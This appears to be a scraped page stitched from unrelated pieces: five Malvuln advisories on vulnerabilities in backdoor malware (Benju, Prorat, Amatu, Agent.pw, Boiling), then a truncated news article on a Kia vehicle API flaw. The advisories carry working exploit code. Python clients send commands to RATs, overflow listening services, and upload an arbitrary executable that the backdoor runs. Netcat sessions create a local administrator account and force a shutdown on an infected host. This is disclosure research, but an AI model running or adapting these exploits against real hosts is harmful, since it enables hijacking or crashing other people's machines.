Backdoor.Win32.Benju.a malware suffers from a remote command execution vulnerability.  This is the 700th release of a malvuln finding.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024Original source: https://malvuln.com/advisory/88922242e8805bfbc5981e55fdfadd71.txtContact: malvuln13@gmail.comMedia: x.com/malvuln Threat: Backdoor.Win32.Benju.aVulnerability: Unauthenticated Remote Command ExecutionFamily: BenjuType: PE32MD5: 88922242e8805bfbc5981e55fdfadd71SHA256: 7d34804173e09d0f378dfc8c9212fe77ff51f08c9d0b73d00a19b7045ddc1f0e Vuln ID: MVID-2024-0700Disclosure: 09/27/2024Description: The RAT listens on TCP ports 200 and 15000. Third-party adversaries who can reach an infected host, can execute commands made available by the malware. Commands are sent in Spanish, using netcat or telnet fails to run cmds after connecting as they send CRLFs e.g. "quitar\r\n" fails "quitar" succeeds. Therefore, we need a custom client to send commands to the Benju RAT.Reiniciado = rebootquitar = terminate backdoorcerrarsesion = shutdownEnciendemonitor = turn on monitorapagamonitor = monitor offOcultaiconos = hide iconsactivachat = open chat windowBloquearaton = block ratDesbloquearaton = unblock ratActivainicio = activate startcerrarsesion = logoutOcultaiconosConectadoOcultado los iconoscerrarsesionConectadoCerrado la sesion de windowsEnciendemonitorConectadoMonitor encendidoapagamonitorConectadoMonitor apagadoquitarConectadoPc desinfectadoExploit/PoC:from socket import *import time,sysCMD=["Reiniciado","Enciendemonitor","apagamonitor","Ocultaiconos","Activainicio",          "activachat","Bloquearaton","Desbloquearaton","cerrarsesion","quitar"]def chk_res(s):    res=""    while True:        res += s.recv(512).decode()        if res:            break    return resdef Benju_Over(MALWARE_HOST, PTR):        PORT=200    s=socket(AF_INET, SOCK_STREAM)    s.connect((MALWARE_HOST, PORT))    print(CMD[PTR])    s.send("".encode())    print(chk_res(s))    PAYLOAD= CMD[PTR]   #Don't send CRLFs    s.send(PAYLOAD.encode())    time.sleep(0.5)    print(chk_res(s))    s.close()    print("[*] Benju (over) Rat PoC by malvuln")if __name__=="__main__":    c=-1    if len(sys.argv) < 3:        print("[+] Benju (over) Rat PoC by malvuln")        print("[+] Greetz Edu_Braun_0day, Indoushka, Todd J")        print("[!] Usage: Infected IP, Command")        print("[-]=============================")        for x in CMD:            c+=1            print("[+] "+str(c) + " "+ x)            exit()    try:        MALWARE_HOST=sys.argv[1]        PTR=int(sys.argv[2])        if MALWARE_HOST and PTR:            Benju_Over(MALWARE_HOST, PTR)    except Exception as e:        print("[!] "+str(e))        exit()Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Backdoor.Win32.Benju.a MVID-2024-0700 Remote Command Execution

Backdoor.Win32.Prorat.jz malware suffers from a buffer overflow vulnerability.

Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024  
Original source: https://malvuln.com/advisory/277f9a4db328476300c4da5f680902ea.txt  
Contact: malvuln13@gmail.com  
Media: x.com/malvuln 

Threat: Backdoor.Win32.Prorat.jz  
Vulnerability: Remote Stack Buffer Overflow (SEH)  
Description: The RAT listens on TCP ports 51100,5112,5110 and runs an FTP service. Prorat uses a vulnerable component in a secondary malware it drops on the victim system named "Netbot_Attacker VIP 6.0 Version korea.exe" MD5: 2168a606464c7fd016c260140a62815e. The dropped malware listens on TCP port 8080 and 80 on subsequent restarts. Third-party attackers who can reach an infected machine can send specially crafted sequential packetz to port 8080. This will trigger a stack buffer overflow overwriting the ECX, EIP registers and Structured Exception Handler (SEH).  
Family: Prorat  
Type: PE32  
MD5: 277f9a4db328476300c4da5f680902ea  
SHA256: 1134dffe52ea01f0d93a6889edd36620dbe9ee04224ad662e4f5463c4feb98a7   
Vuln ID: MVID-2024-0699  
Dropped files:  ~imsinst.exe, NetBot.ini  in  \AppData\Local\Temp directory.  
ASLR: False  
DEP: False  
CFG: False  
Safe SEH: False  
Disclosure: 09/27/2024

Memory Dump:  
(1974.354): Stack buffer overflow - code c0000409 (first/second chance not available)  
eax=00000000 ebx=00000000 ecx=41414141 edx=00000000 esi=00000000 edi=00000002  
eip=76fced3c esp=0703f8d0 ebp=0703f910 iopl=0         nv up ei pl nz ac po nc  
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000212  
ntdll!ZwWaitForMultipleObjects+0xc:  
76fced3c c21400          ret     14h

0:008> .ecxr  
eax=00000000 ebx=04367000 ecx=41414141 edx=00000000 esi=04367000 edi=00406120  
eip=41414141 esp=0703ff80 ebp=0703ff94 iopl=0         nv up ei pl nz na pe nc  
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010206  
41414141 ??              ???

0:008> !analyze -v  
*******************************************************************************  
*                                                                             *  
*                        Exception Analysis                                   *  
*                                                                             *  
*******************************************************************************

*** WARNING: Unable to verify checksum for Netbot_Attacker VIP 6.0 Version korea.exe  
*** ERROR: Module load completed but symbols could not be loaded for Netbot_Attacker VIP 6.0 Version korea.exe

FAULTING_IP:   
+2f  
41414141 ??              ???

EXCEPTION_RECORD:  0703fad0 -- (.exr 0x703fad0)  
ExceptionAddress: 41414141  
   ExceptionCode: c0000005 (Access violation)  
  ExceptionFlags: 00000008  
NumberParameters: 2  
   Parameter[0]: 00000000  
   Parameter[1]: 41414141  
Attempt to read from address 41414141

PROCESS_NAME:  Netbot_Attacker VIP 6.0 Version korea.exe

ERROR_CODE: (NTSTATUS) 0xc0000409 - The system detected an overrun of a stack-based buffer in this application. This overrun could potentially allow a malicious user to gain control of this application.

EXCEPTION_CODE: (NTSTATUS) 0xc0000409 - The system detected an overrun of a stack-based buffer in this application. This overrun could potentially allow a malicious user to gain control of this application.

EXCEPTION_PARAMETER1:  00000015

MOD_LIST: <ANALYSIS/>

NTGLOBALFLAG:  0

APPLICATION_VERIFIER_FLAGS:  0

FAILED_INSTRUCTION_ADDRESS:   
+2f  
41414141 ??              ???

CONTEXT:  0703fb20 -- (.cxr 0x703fb20)  
eax=00000000 ebx=04367000 ecx=41414141 edx=00000000 esi=04367000 edi=00406120  
eip=41414141 esp=0703ff80 ebp=0703ff94 iopl=0         nv up ei pl nz na pe nc  
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010206  
41414141 ??              ???  
Resetting default scope

READ_ADDRESS:  41414141 

FOLLOWUP_IP:   
+2f  
41414141 ??              ???

ADDITIONAL_DEBUG_TEXT:  Followup set based on attribute [Is_ChosenCrashFollowupThread] from Frame:[0] on thread:[PSEUDO_THREAD]

LAST_CONTROL_TRANSFER:  from 41414141 to 41414141

FAULTING_THREAD:  ffffffff

BUGCHECK_STR:  APPLICATION_FAULT_STACK_BUFFER_OVERRUN_MISSING_GSFRAME_EXPLOITABLE_FILL_PATTERN_41414141_STACKIMMUNE

PRIMARY_PROBLEM_CLASS:  STACK_BUFFER_OVERRUN

DEFAULT_BUCKET_ID:  STACK_BUFFER_OVERRUN

IP_ON_HEAP:  41414141  
The fault address in not in any loaded module, please check your build's rebase  
log at <releasedir>\bin\build_logs\timebuild\ntrebase.log for module which may  
contain the address if it were loaded.

IP_IN_FREE_BLOCK: 41414141

FRAME_ONE_INVALID: 1

STACK_TEXT:    
00000000 00000000 unknown!netbot_attacker_vip_6.0_version_korea.exe+0x0

STACK_COMMAND:  .cxr 000000000703FB20 ; kb ; ** Pseudo Context ** ; kb

SYMBOL_NAME:  unknown!netbot_attacker_vip_6.0_version_korea.exe

FOLLOWUP_NAME:  MachineOwner

MODULE_NAME: unknown

IMAGE_NAME:  unknown

DEBUG_FLR_IMAGE_TIMESTAMP:  0

FAILURE_BUCKET_ID:  STACK_BUFFER_OVERRUN_c0000409_unknown!Unloaded

BUCKET_ID:  APPLICATION_FAULT_STACK_BUFFER_OVERRUN_MISSING_GSFRAME_EXPLOITABLE_FILL_PATTERN_41414141_STACKIMMUNE_MISSING_GSFRAME_BAD_IP_unknown!netbot_attacker_vip_6.0_version_korea.exe

Followup: MachineOwner  
---------

0:008> !exchain  
0703f988: ntdll!_except_handler4+0 (76fd6a50)  
  CRT scope  0, func:   ntdll!RtlReportExceptionHelper+251 (770157ad)  
Invalid exception stack at 41414141

Exploit/PoC:  
from socket import *  
import time

MALWARE_HOST="x.x.x.x"  
PORT=8080  #80 after initial restart

def Prorat_BOF():

    print("[+] Backdoor.Win32.Prorat.jz")  
    print("[+] Remote Stack Buffer Overflow - SEH")  
    print("[+] MD5: 277f9a4db328476300c4da5f680902ea")

        for i in range(1, 13):  
        s=socket(AF_INET, SOCK_STREAM)  
        s.connect((MALWARE_HOST, PORT))  
        PAYLOAD="A"*100 * i  
        s.send(PAYLOAD.encode())  
        time.sleep(0.5)  
        print(len(PAYLOAD))  
        s.close()

if __name__=="__main__":  
    Prorat_BOF()  
    print("Malvuln")

Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Backdoor.Win32.Prorat.jz MVID-2024-0699 Buffer Overflow

Backdoor.Win32.Amatu.a malware suffers from a remote arbitrary file write vulnerability.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024Original source: https://malvuln.com/advisory/1e2d0b90ffc23e00b743c41064bdcc6b.txtContact: malvuln13@gmail.comMedia: x.com/malvuln  Threat: Backdoor.Win32.Amatu.aVulnerability: Remote Arbitrary File Write (RCE)Family: AmatuType: PE32MD5: 1e2d0b90ffc23e00b743c41064bdcc6bSHA256: 77fff9931013ab4de6d4be66ca4fda47be37b6f706a7062430ee8133c7521297Vuln ID: MVID-2024-0698Dropped files: mine.exeDisclosure: 09/27/2024Description: The malware listens on TCP port 2121. Third-party adversaries who can reach an infected host, can write arbitrary executable code to a file named "mine.exe" to SysWOW64 directory. The mine.exe  PE file executes immediately and runs as a child of the parent process malware. Amatu calls several Win32 APIs "GetSystemDirectoryA", "CreateFileA" and "WriteFile" to save the inbound code to disk. Finally, it calls "ShellExecuteA" executing the arbitrary PE file sent by the attacker. Setup a gateway and fake DNS sinkhole to mimic outbound internet access for the C2 or the port may not open."Amatu.a" disassemblycall    ds:GetSystemDirectoryA004A1FCB                 lea     ecx, [ebp+Source]004A1FD1                 push    ecx             ; Source004A1FD2                 lea     edx, [ebp+Buffer]004A1FD8                 push    edx             ; Destination004A1FD9                 call    strcat004A1FDE                 add     esp, 8004A1FE1                 push    offset aMine    ; "mine"004A1FE6                 lea     eax, [ebp+Buffer]004A1FEC                 push    eax             ; Destination004A1FED                 call    strcat004A1FF2                 add     esp, 8004A1FF5                 push    offset aExe     ; ".exe"004A1FFA                 lea     ecx, [ebp+Buffer]004A2000                 push    ecx             ; Destination004A2001                 call    strcat004A2022                 call    ds:CreateFileA 004A206B                 call    recv.004A2070                 mov     [ebp+nNumberOfBytesToWrite], eax.004A2076                 cmp     [ebp+nNumberOfBytesToWrite], 0push    eax             ; lpNumberOfBytesWritten004A209C                 mov     ecx, [ebp+nNumberOfBytesToWrite]004A20A2                 push    ecx             ; nNumberOfBytesToWrite004A20A3                 lea     edx, [ebp+buf]004A20A9                 push    edx             ; lpBuffer004A20AA                 mov     eax, [ebp+hFile]004A20B0                 push    eax             ; hFile004A20B1                 call    ds:WriteFilemov     ecx, [ebp+hFile]004A20BF                 push    ecx             ; hObject004A20C0                 call    ds:CloseHandle004A20C6                 push    1               ; nShowCmd004A20C8                 push    0               ; lpDirectory004A20CA                 push    0               ; lpParameters004A20CC                 lea     edx, [ebp+Buffer]004A20D2                 push    edx             ; lpFile004A20D3                 push    offset Operation ; "open"004A20D8                 push    0               ; hwnd004A20DA                 call    ds:ShellExecuteA004A20E0                 mov     eax, [ebp+s]004A20E3                 push    eax             ; s004A20E4                 call    closesocketExploit/PoC:1) Create a small PE file named "mine.exe", I used MASM and packed it with FSG."mine.exe" include \masm32\include\masm32rt.inc.dataHATE db "Masm32:", 0MyReal8 REAL8 123.456.data?aDword dd ?.codestart:  invoke MessageBox, 0, chr$("DOOM!"), addr HATE, MB_OK  mov eax, 123  exitend start2) Our custom client to send "mine.exe" to the remote infected host.from socket import *MALWARE_HOST="x.x.x.x"PORT=2121DOOM="mine.exe" def doit():    s=socket(AF_INET, SOCK_STREAM)    s.connect((MALWARE_HOST, PORT))    f = open(DOOM, "rb")    EXE = f.read()    s.send(EXE)    while EXE:        s.send(EXE)        EXE=f.read()    s.close()    print("By Malvuln");if __name__=="__main__":    doit()Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Backdoor.Win32.Amatu.a MVID-2024-0698 Arbitrary File Write

Backdoor.Win32.Agent.pw malware suffers from a buffer overflow vulnerability.

Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024  
Original source: https://malvuln.com/advisory/68dd7df213674e096d6ee255a7b90088.txt  
Contact: malvuln13@gmail.com  
Media: x.com/malvuln  

Threat: Backdoor.Win32.Agent.pw  
Vulnerability: Remote Stack Buffer Overflow (SEH)  
Description: The malware listens on TCP port 21111. Third-party attackers who can reach an infected machine can send specially crafted sequential packetz triggering a stack buffer overflow overwriting the ECX, EDI registers and Structured Exception Handler (SEH). Sending a packet containing the ascii character "A" or "41", registers are overwritten with "3431" as 4 is 34 hex and 1 is 31 hex. The lowercase character "R" consistently triggers an access violation with registers being overwritten with "r" 72 hex.  
Family: Agent  
Type: PE32  
MD5: 68dd7df213674e096d6ee255a7b90088  
SHA256: 2ba1d27325224407b6d57e0e8d141e3f301225d18a68bb5380c46287a0fc4441  
Vuln ID: MVID-2024-0697  
Dropped files:   
ASLR: False  
DEP: False  
CFG: False  
Safe SEH: False  
Disclosure: 09/27/2024

Memory Dump:  
(1f90.1888): Stack buffer overflow - code c0000409 (first/second chance not available)  
eax=00000000 ebx=00000000 ecx=72727272 edx=040b1a3c esi=00000000 edi=00000002  
eip=76fced3c esp=0019de98 ebp=0019ded8 iopl=0         nv up ei pl nz na po nc  
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000202  
ntdll!ZwWaitForMultipleObjects+0xc:  
76fced3c c21400          ret     14h

0:000> .ecxr  
eax=025806f0 ebx=00000150 ecx=72727272 edx=040b1a3c esi=00000000 edi=72727272  
eip=00411515 esp=0019e54c ebp=0019e56c iopl=0         nv up ei pl zr na pe nc  
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246  
Backdoor_Win32_Agent_pw_68dd7df213674e096d6ee255a7b90088+0x11515:  
00411515 897904          mov     dword ptr [ecx+4],edi ds:002b:72727276=????????

0:000> !analyze -v  
*******************************************************************************  
*                                                                             *  
*                        Exception Analysis                                   *  
*                                                                             *  
*******************************************************************************

FAULTING_IP:   
Backdoor_Win32_Agent_pw_68dd7df213674e096d6ee255a7b90088+11515  
00411515 897904          mov     dword ptr [ecx+4],edi

EXCEPTION_RECORD:  0019e09c -- (.exr 0x19e09c)  
ExceptionAddress: 00411515 (Backdoor_Win32_Agent_pw_68dd7df213674e096d6ee255a7b90088+0x00011515)  
   ExceptionCode: c0000005 (Access violation)  
  ExceptionFlags: 00000008  
NumberParameters: 2  
   Parameter[0]: 00000001  
   Parameter[1]: 72727276  
Attempt to write to address 72727276

PROCESS_NAME:  Backdoor.Win32.Agent.pw.68dd7df213674e096d6ee255a7b90088.exe

ERROR_CODE: (NTSTATUS) 0xc0000409 - The system detected an overrun of a stack-based buffer in this application. This overrun could potentially allow a malicious user to gain control of this application.

EXCEPTION_CODE: (NTSTATUS) 0xc0000409 - The system detected an overrun of a stack-based buffer in this application. This overrun could potentially allow a malicious user to gain control of this application.

EXCEPTION_PARAMETER1:  00000015

MOD_LIST: <ANALYSIS/>

NTGLOBALFLAG:  0

APPLICATION_VERIFIER_FLAGS:  0

CONTEXT:  0019e0ec -- (.cxr 0x19e0ec)  
eax=025806f0 ebx=00000150 ecx=72727272 edx=040b1a3c esi=00000000 edi=72727272  
eip=00411515 esp=0019e54c ebp=0019e56c iopl=0         nv up ei pl zr na pe nc  
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246  
Backdoor_Win32_Agent_pw_68dd7df213674e096d6ee255a7b90088+0x11515:  
00411515 897904          mov     dword ptr [ecx+4],edi ds:002b:72727276=????????  
Resetting default scope

WRITE_ADDRESS:  72727276 

FOLLOWUP_IP:   
Backdoor_Win32_Agent_pw_68dd7df213674e096d6ee255a7b90088+11515  
00411515 897904          mov     dword ptr [ecx+4],edi

FAULTING_THREAD:  00001888

BUGCHECK_STR:  APPLICATION_FAULT_STACK_BUFFER_OVERRUN_MISSING_GSFRAME_STRING_DEREFERENCE_EXPLOITABLE_FILL_PATTERN_72727272

PRIMARY_PROBLEM_CLASS:  STACK_BUFFER_OVERRUN_EXPLOITABLE_FILL_PATTERN_72727272

DEFAULT_BUCKET_ID:  STACK_BUFFER_OVERRUN_EXPLOITABLE_FILL_PATTERN_72727272

LAST_CONTROL_TRANSFER:  from 0040c987 to 00411515

STACK_TEXT:    
WARNING: Stack unwind information not available. Following frames may be wrong.  
0019e56c 0040c987 025805a8 0000003f 0019e5bc Backdoor_Win32_Agent_pw_68dd7df213674e096d6ee255a7b90088+0x11515  
0019e768 72727272 72727272 72727272 72727272 Backdoor_Win32_Agent_pw_68dd7df213674e096d6ee255a7b90088+0xc987  
0019e76c 72727272 72727272 72727272 72727272 0x72727272  
0019e770 72727272 72727272 72727272 72727272 0x72727272  
0019e774 72727272 72727272 72727272 72727272 0x72727272  
0019e778 72727272 72727272 72727272 72727272 0x72727272  
0019e77c 72727272 72727272 72727272 72727272 0x72727272  
0019e780 72727272 72727272 72727272 72727272 0x72727272  
0019e784 72727272 72727272 72727272 72727272 0x72727272  
0019e788 72727272 72727272 72727272 72727272 0x72727272  
0019e78c 72727272 72727272 72727272 72727272 0x72727272  
0019e790 72727272 72727272 72727272 72727272 0x72727272  
0019e794 72727272 72727272 72727272 72727272 0x72727272  
0019e798 72727272 72727272 72727272 72727272 0x72727272  
0019e79c 72727272 72727272 72727272 72727272 0x72727272  
0019e7a0 72727272 72727272 72727272 72727272 0x72727272  
0019e7a4 72727272 72727272 72727272 72727272 0x72727272  
0019e7a8 72727272 72727272 72727272 72727272 0x72727272  
0019e7ac 72727272 72727272 72727272 72727272 0x72727272  
0019e7b0 72727272 72727272 72727272 72727272 0x72727272  
0019e7b4 72727272 72727272 72727272 72727272 0x72727272  
0019e7b8 72727272 72727272 72727272 72727272 0x72727272  
0019e7bc 72727272 72727272 72727272 72727272 0x72727272  
0019e7c0 72727272 72727272 72727272 72727272 0x72727272  
0019e7c4 72727272 72727272 72727272 72727272 0x72727272  
0019e7c8 72727272 72727272 72727272 72727272 0x72727272  
0019e7cc 72727272 72727272 72727272 72727272 0x72727272  
0019e7d0 72727272 72727272 72727272 72727272 0x72727272  
0019e7d4 72727272 72727272 72727272 72727272 0x72727272  
0019e7d8 72727272 72727272 72727272 72727272 0x72727272  
0019e7dc 72727272 72727272 72727272 72727272 0x72727272  
0019e7e0 72727272 72727272 72727272 72727272 0x72727272  
0019e7e4 72727272 72727272 72727272 72727272 0x72727272  
0019e7e8 72727272 72727272 72727272 72727272 0x72727272  
0019e7ec 72727272 72727272 72727272 72727272 0x72727272  
0019e7f0 72727272 72727272 72727272 72727272 0x72727272  
0019e7f4 72727272 72727272 72727272 72727272 0x72727272  
0019e7f8 72727272 72727272 72727272 72727272 0x72727272  
0019e7fc 72727272 72727272 72727272 72727272 0x72727272  
0019e800 72727272 72727272 72727272 72727272 0x72727272  
0019e804 72727272 72727272 72727272 72727272 0x72727272  
0019e808 72727272 72727272 72727272 72727272 0x72727272  
0019e80c 72727272 72727272 72727272 72727272 0x72727272  
0019e810 72727272 72727272 72727272 72727272 0x72727272  
0019e814 72727272 72727272 72727272 72727272 0x72727272  
0019e818 72727272 72727272 72727272 72727272 0x72727272  
0019e81c 72727272 72727272 72727272 72727272 0x72727272  
0019e820 72727272 72727272 72727272 72727272 0x72727272  
0019e824 72727272 72727272 72727272 72727272 0x72727272  
0019e828 72727272 72727272 72727272 72727272 0x72727272  
0019e82c 72727272 72727272 72727272 72727272 0x72727272  
0019e830 72727272 72727272 72727272 72727272 0x72727272  
0019e834 72727272 72727272 72727272 72727272 0x72727272  
0019e838 72727272 72727272 72727272 72727272 0x72727272  
0019e83c 72727272 72727272 72727272 72727272 0x72727272  
0019e840 72727272 72727272 72727272 72727272 0x72727272  
0019e844 72727272 72727272 72727272 72727272 0x72727272  
0019e848 72727272 72727272 72727272 72727272 0x72727272  
0019e84c 72727272 72727272 72727272 72727272 0x72727272  
0019e850 72727272 72727272 72727272 72727272 0x72727272  
0019e854 72727272 72727272 72727272 72727272 0x72727272  
0019e858 72727272 72727272 72727272 72727272 0x72727272  
0019e85c 72727272 72727272 72727272 72727272 0x72727272  
0019e860 72727272 72727272 72727272 72727272 0x72727272  
0019e864 72727272 72727272 72727272 72727272 0x72727272  
0019e868 72727272 72727272 72727272 72727272 0x72727272  
0019e86c 72727272 72727272 72727272 72727272 0x72727272  
0019e870 72727272 72727272 72727272 72727272 0x72727272  
0019e874 72727272 72727272 72727272 72727272 0x72727272  
0019e878 72727272 72727272 72727272 72727272 0x72727272  
0019e87c 72727272 72727272 72727272 72727272 0x72727272  
0019e97c 76fa665c 0019ea68 001a1758 000007a0 0x72727272  
0019e9e0 76fa01a3 b8e17520 04394df0 04390000 ntdll!RtlpFindUnicodeStringInSection+0x19c  
0019ea14 00000000 00000003 00000000 0000003b ntdll!RtlpFreeHeap+0x723

SYMBOL_STACK_INDEX:  0

SYMBOL_NAME:  Backdoor_Win32_Agent_pw_68dd7df213674e096d6ee255a7b90088+11515

FOLLOWUP_NAME:  MachineOwner

MODULE_NAME: Backdoor_Win32_Agent_pw_68dd7df213674e096d6ee255a7b90088

IMAGE_NAME:  Backdoor.Win32.Agent.pw.68dd7df213674e096d6ee255a7b90088.exe

DEBUG_FLR_IMAGE_TIMESTAMP:  4228698c

STACK_COMMAND:  .cxr 0x19e0ec ; kb

FAILURE_BUCKET_ID:  STACK_BUFFER_OVERRUN_EXPLOITABLE_FILL_PATTERN_72727272_c0000409_Backdoor.Win32.Agent.pw.68dd7df213674e096d6ee255a7b90088.exe!Unknown

BUCKET_ID:  APPLICATION_FAULT_STACK_BUFFER_OVERRUN_MISSING_GSFRAME_STRING_DEREFERENCE_EXPLOITABLE_FILL_PATTERN_72727272_MISSING_GSFRAME_Backdoor_Win32_Agent_pw_68dd7df213674e096d6ee255a7b90088+11515

Followup: MachineOwner  
---------

0:000> !exchain  
0019df50: ntdll!_except_handler4+0 (76fd6a50)  
  CRT scope  0, func:   ntdll!RtlReportExceptionHelper+251 (770157ad)  
0019e8f8: 72727272  
Invalid exception stack at 72727272

Exploit/PoC:  
from socket import *  
import time

MALWARE_HOST="x.x.x.x"  
PORT=21111  

def doit():  
    print("[+] Backdoor.Win32.Agent.pw")  
    print("[+] Remote Stack Buffer Overflow - SEH")  
    print("[+] MD5: 68dd7df213674e096d6ee255a7b90088")

    for i in range(1, 16):  
        s=socket(AF_INET, SOCK_STREAM)  
        s.connect((MALWARE_HOST, PORT))  
        PAYLOAD="r"*512 * i   
        s.send(PAYLOAD.encode())  
        time.sleep(0.3)  
        print(len(PAYLOAD))  
        s.close()

if __name__=="__main__":  
    doit()  
    print("Malvuln")

Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Backdoor.Win32.Agent.pw MVID-2024-0697 Buffer Overflow

Backdoor.Win32.Boiling malware suffers from a code execution vulnerability.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024Original source: https://malvuln.com/advisory/80cb490e5d3c4205434850eff6ef5f8f.txtContact: malvuln13@gmail.comMedia: x.com/malvuln  Threat: Backdoor.Win32.BoilingVulnerability: Unauthenticated Remote Command ExecutionDescription: The malware listens on TCP port 4369. Third party adversaries who can reach an infected host, can issue single OS commands to takeover the system undermining the initial infection.Family: BoilingType: PE32MD5: 80cb490e5d3c4205434850eff6ef5f8fSHA256: cbaefa79eb48d893426d438b48ca0fc6e7f6f4a6810b9c1e76bf625b69a609e1Vuln ID: MVID-2024-0696Disclosure: 09/27/2024Exploit/PoC:nc64.exe x.x.x.x 4369calcOK, Success in Execute Commandúnc64.exe 192.168.18.125 4369net user hyp3rlinx 666 /addOK, Success in Execute Commandúnc64.exe 192.168.18.125 4369net localgroup administrators hyp3rlinx /addOK, Success in Execute Commandúnc64.exe 192.168.18.125 4369ping 8.8.8.8 > out.txtOK, Success in Execute Commandúshutdown -fOK, Success in Execute CommandúDisclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Backdoor.Win32.Boiling MVID-2024-0696 Code Execution

The vulnerability is the latest discovered in connected vehicles in recent years, and it points out the cyber dangers lurking in automotive APIs.

Source: Jonathan WeissI via Shutterstock

Car buyers typically have many questions when purchasing a new automobile, but few are likely to consider whether an attacker could remotely control their vehicle using just license plate information.

Yet that's exactly what millions of Kia vehicles allowed until mid-August, when the automaker fixed a flaw that enabled such access, after independent security researchers alerted them to the issue.

**Remote Control of Kia Cars & SUVs**

The glitch is similar to those that the same group of researchers and others have discovered in recent years, and is sure to stoke already high concerns over the vulnerability of modern connected vehicles to cyberattacks.

In a Sept. 26 report, independent researcher Sam Curry said he discovered the Kia vulnerability when doing some follow-up research on multiple flaws he and colleagues discovered a couple of years ago in vehicles from Kia, Honda, Infiniti, Nissan, Acura, BMW, Mercedes, and others.  

At the time, the researchers showed how anyone could take advantage of the vulnerabilities to issue commands for remotely locking and unlocking vehicles, starting and shutting down the engine, and activating a vehicle's headlight and horn. Some of the flaws allowed an adversary to remotely take over an owner's account and lock them out of managing their own vehicle, while others enabled remote access to a vehicle's camera, with the ability to view live images from inside the vehicle. Some of the hacks required an adversary to have little more than a vehicle identification number, and sometimes even just an owner's email address.

**An Issue With Automotive API Protocols**

As with many of the previous flaws, the new issue that Curry and his fellow researchers discovered had to do with the application programming interface (API) protocols that enable Internet-to-vehicle commands on Kia automobiles.

The researchers found that it was relatively easy to register a Kia dealer account and authenticate it to the account. They could then use the generated access token to call APIs reserved for use by dealers, for things like vehicle and account lookup, owner enrollment, and several other functions.

After some poking around, the researchers found that they could use their access to the dealer APIs to enter a vehicle's license-plate information and retrieve data that essentially allowed them to control key vehicle functions. These included functions like turning the ignition on and off, remotely locking and unlocking vehicles, activating its headlights and horn, and determining its exact geolocation.

In addition, they were able to retrieve the owner's personally identifying information (PII) and quietly register themselves as the primary account holder. That meant they had control of functions normally available only the owner. The issues affected a range of Kia model years, from 2024 and 2025 all the way back to 2013. With the older vehicles, the researchers developed a proof-of-concept tool that showed how anyone could enter a Kia's vehicle license plate info and in a matter of 30 seconds execute remote commands on the vehicle.

"The recent discovery underscores the intricate challenges posed by the complex API protocols — such as gRPC, MQTT, and REST — used in connected cars," says Ivan Novikov, CEO of API security firm Wallarm. "Automakers must prioritize enhancing their cybersecurity measures by implementing stronger authentication methods and securing communication channels to protect against unauthorized access."

Akhil Mittal, senior manager of cybersecurity strategy and solutions at Synopsys Software Integrity Group, says the new discovery highlights how the biggest vulnerabilities in connected vehicles often have to do with systems that communicate with the outside world. He points to always-connected vehicle telematics systems as one example of such a component.

